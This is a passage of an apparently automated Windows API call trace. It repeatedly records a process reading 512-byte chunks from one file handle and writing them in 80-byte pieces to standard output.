out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] GetFileType (hFile=0x4c) returned 0x1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] GetFileType (hFile=0x4c) returned 0x1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] GetFileType (hFile=0x4c) returned 0x1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] GetFileType (hFile=0x4c) returned 0x1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] GetFileType (hFile=0x4c) returned 0x1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, 
lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] GetFileType (hFile=0x4c) returned 0x1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.737] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] GetFileType (hFile=0x4c) returned 0x1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] GetFileType (hFile=0x4c) returned 0x1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] GetFileType (hFile=0x4c) returned 0x1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] GetFileType (hFile=0x4c) returned 0x1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0112.738] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] GetFileType (hFile=0x4c) returned 0x1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] GetFileType (hFile=0x4c) returned 0x1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] GetFileType (hFile=0x4c) returned 0x1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] GetFileType (hFile=0x4c) returned 0x1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.738] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) 
returned 1 [0112.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.738] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] GetFileType (hFile=0x4c) returned 0x1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] GetFileType (hFile=0x4c) returned 0x1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] GetFileType (hFile=0x4c) returned 0x1 [0112.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] GetFileType (hFile=0x4c) returned 0x1 [0112.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] GetFileType (hFile=0x4c) returned 0x1 [0112.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.739] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0112.739] GetFileType (hFile=0x4c) returned 0x1 [0112.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] GetFileType (hFile=0x4c) returned 0x1 [0112.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] GetFileType (hFile=0x4c) returned 0x1 [0112.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.739] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.740] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] GetFileType (hFile=0x4c) returned 0x1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] GetFileType (hFile=0x4c) returned 0x1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] GetFileType (hFile=0x4c) returned 0x1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] GetFileType (hFile=0x4c) returned 0x1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] GetFileType (hFile=0x4c) returned 0x1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] GetFileType (hFile=0x4c) returned 0x1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] GetFileType (hFile=0x4c) returned 0x1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, 
lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] GetFileType (hFile=0x4c) returned 0x1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.741] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.741] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.741] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.741] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] GetFileType (hFile=0x4c) returned 0x1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] GetFileType (hFile=0x4c) returned 0x1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] GetFileType (hFile=0x4c) returned 0x1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] GetFileType (hFile=0x4c) returned 0x1 [0112.741] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] GetFileType (hFile=0x4c) returned 0x1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] GetFileType (hFile=0x4c) returned 0x1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] GetFileType (hFile=0x4c) returned 0x1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] GetFileType (hFile=0x4c) returned 0x1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.742] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.742] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] GetFileType (hFile=0x4c) returned 0x1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] GetFileType (hFile=0x4c) returned 0x1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] GetFileType (hFile=0x4c) returned 0x1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] GetFileType (hFile=0x4c) returned 0x1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] GetFileType (hFile=0x4c) returned 0x1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, 
lpOverlapped=0x0) returned 1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] GetFileType (hFile=0x4c) returned 0x1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] GetFileType (hFile=0x4c) returned 0x1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] GetFileType (hFile=0x4c) returned 0x1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.743] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.743] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] GetFileType (hFile=0x4c) returned 0x1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] GetFileType (hFile=0x4c) returned 0x1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] WriteFile (in: hFile=0x4c, 
lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] GetFileType (hFile=0x4c) returned 0x1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] GetFileType (hFile=0x4c) returned 0x1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] GetFileType (hFile=0x4c) returned 0x1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] GetFileType (hFile=0x4c) returned 0x1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] GetFileType (hFile=0x4c) returned 0x1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] GetFileType (hFile=0x4c) returned 0x1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.744] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.744] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] GetFileType (hFile=0x4c) returned 0x1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] GetFileType (hFile=0x4c) returned 0x1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] GetFileType (hFile=0x4c) returned 0x1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c 
